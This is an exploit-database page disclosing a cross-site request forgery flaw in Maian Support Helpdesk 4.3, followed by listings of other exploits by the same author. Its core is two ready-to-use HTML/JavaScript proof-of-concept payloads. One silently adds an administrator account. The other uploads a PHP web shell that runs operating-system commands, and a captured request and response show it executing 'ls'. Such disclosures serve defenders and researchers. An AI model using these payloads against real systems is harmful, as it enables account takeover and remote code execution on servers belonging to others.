Menu

Search for hundreds of thousands of exploits

"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)"

Author

Exploit author

Besim

Platform

Exploit platform

php

Release date

Exploit published date

2020-04-27

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-04-26
# Author: Besim ALTINOK
# Vendor Homepage: https://www.maiansupport.com
# Software Link: https://www.maiansupport.com/zip.html
# Version: v4.3
# Tested on: Xampp
# Credit: İsmail BOZKURT
----------------------------------------------

Here is the Detail:
--------------------------------------------------
This product is unprotected against CSRF vulnerabilities. With this attack,
you can add an admin account to the system. In addition, you can add files
from the F.A.Q field as admin.There are no file restrictions here.
Therefore, you can upload a PHP file here with CSRF.

If you want, you can add an admin account first and then access the system
and upload files.
Or you can upload files with direct admin rights.

---------------------------------------------------
CSRF PoC - 1 (Add Administrator user)
-------------------------------------

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/helpdesk/admin/index.php?ajax=team"
method="POST">
      <input type="hidden" name="enabled" value="yes" />
      <input type="hidden" name="admin" value="yes" />
      <input type="hidden" name="welcome" value="yes" />
      <input type="hidden" name="name" value="Besim&#32;ALTINOK" />
      <input type="hidden" name="email" value="test2&#64;gmail&#46;com" />
      <input type="hidden" name="accpass" value="111111" />
      <input type="hidden" name="timezone" value="0" />
      <input type="hidden" name="language" value="" />
      <input type="hidden" name="addpages" value="" />
      <input type="hidden" name="notePadEnable" value="yes" />
      <input type="hidden" name="enableLog" value="yes" />
      <input type="hidden" name="mergeperms" value="yes" />
      <input type="hidden" name="profile" value="yes" />
      <input type="hidden" name="ticketHistory" value="yes" />
      <input type="hidden" name="close" value="yes" />
      <input type="hidden" name="lock" value="yes" />
      <input type="hidden" name="editperms&#91;&#93;" value="ticket" />
      <input type="hidden" name="editperms&#91;&#93;" value="reply" />
      <input type="hidden" name="timer" value="yes" />
      <input type="hidden" name="startwork" value="yes" />
      <input type="hidden" name="workedit" value="yes" />
      <input type="hidden" name="notify" value="yes" />
      <input type="hidden" name="spamnotify" value="yes" />
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="nameFrom" value="" />
      <input type="hidden" name="emailFrom" value="" />
      <input type="hidden" name="email2" value="" />
      <input type="hidden" name="notes" value="" />
      <input type="hidden" name="mailbox" value="yes" />
      <input type="hidden" name="mailDeletion" value="yes" />
      <input type="hidden" name="mailScreen" value="yes" />
      <input type="hidden" name="mailCopy" value="yes" />
      <input type="hidden" name="mailFolders" value="5" />
      <input type="hidden" name="mailPurge" value="0" />
      <input type="hidden" name="digest" value="yes" />
      <input type="hidden" name="process" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

- After the Add admin account, you can upload the PHP file.

CSRF PoC 2 - ( Directly, File Upload)
----------------------------------------------------

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/localhost\/helpdesk\/admin\/index.php?ajax=faqattach", true);
        xhr.setRequestHeader("Accept", "application\/json,
text\/javascript, *\/*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------1851832753272583700731626849");
        xhr.withCredentials = true;
        var body =
"-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"file[]\";
filename=\"shell.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php echo system($_GET[\'cmd\']); ?\x3e\n" +
          "\r\n" +
          "-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"file[]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"remote[]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"remote[]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"remote[]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"process\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------1851832753272583700731626849\r\n" +
          "Content-Disposition: form-data; name=\"opath\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1851832753272583700731626849--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request"
onclick="submitRequest();" />
    </form>
  </body>
</html>

HTTP Request:
-----------------------------------------------------------------------------------------
GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec;
bp_ut_session={"pageviews":1,"referrer":"
http://localhost/olms/library/assets/js/images/","landingPage":"
http://localhost/olms/library/assets/js/images/sort_asc.html
","started":1587817504988};
HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6
Upgrade-Insecure-Requests: 1

HTTP Response:
-------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 26 Apr 2020 12:15:31 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/7.2.29
Content-Length: 39
Connection: close
Content-Type: text/html; charset=UTF-8

shell.php
shell_test.php
shell_test.php
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-12 "qdPM 9.1 - Arbitrary File Upload" webapps php Besim
2020-05-11 "CuteNews 2.1.2 - Arbitrary File Deletion" webapps php Besim
2020-05-06 "Booked Scheduler 2.7.7 - Authenticated Directory Traversal" webapps php Besim
2020-05-06 "webTareas 2.0.p8 - Arbitrary File Deletion" webapps php Besim
2020-05-06 "i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion" webapps php Besim
2020-05-05 "PhreeBooks ERP 5.2.5 - Remote Command Execution" webapps php Besim
2020-05-05 "webERP 4.15.1 - Unauthenticated Backup File Access" webapps php Besim
2020-04-29 "School ERP Pro 1.0 - Arbitrary File Read" webapps php Besim
2020-04-28 "School ERP Pro 1.0 - Remote Code Execution" webapps php Besim
2020-04-28 "School ERP Pro 1.0 - 'es_messagesid' SQL Injection" webapps php Besim
2020-04-27 "Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak" webapps hardware Besim
2020-04-27 "Netis E1+ 1.2.32533 - Backdoor Account (root)" webapps hardware Besim
2020-04-27 "PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload" webapps php Besim
2020-04-27 "Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)" webapps php Besim
2020-04-24 "EspoCRM 5.8.5 - Privilege Escalation" webapps multiple Besim
2020-04-24 "Edimax EW-7438RPn 1.13 - Remote Code Execution" webapps hardware Besim
2020-04-23 "User Management System 2.0 - Persistent Cross-Site Scripting" webapps php Besim
2020-04-23 "Complaint Management System 4.2 - Authentication Bypass" webapps php Besim
2020-04-23 "User Management System 2.0 - Authentication Bypass" webapps php Besim
2020-04-23 "Complaint Management System 4.2 - Persistent Cross-Site Scripting" webapps php Besim
2020-04-23 "Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)" webapps php Besim
2020-04-22 "Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)" webapps hardware Besim
2020-04-22 "Edimax EW-7438RPn - Information Disclosure (WiFi Password)" webapps hardware Besim
2016-10-31 "S9Y Serendipity 2.0.4 - Cross-Site Scripting" webapps php Besim
2016-10-23 "Zenbership 107 - Multiple Vulnerabilities" webapps php Besim
2016-10-19 "CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload" webapps php Besim
2016-10-13 "Colorful Blog - Persistent Cross-Site Scripting" webapps php Besim
2016-10-13 "Thatware 0.4.6 - SQL Injection" webapps php Besim
2016-10-13 "Colorful Blog - Cross-Site Request Forgery (Change Admin Password)" webapps php Besim
2016-10-13 "JonhCMS 4.5.1 - SQL Injection" webapps php Besim
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.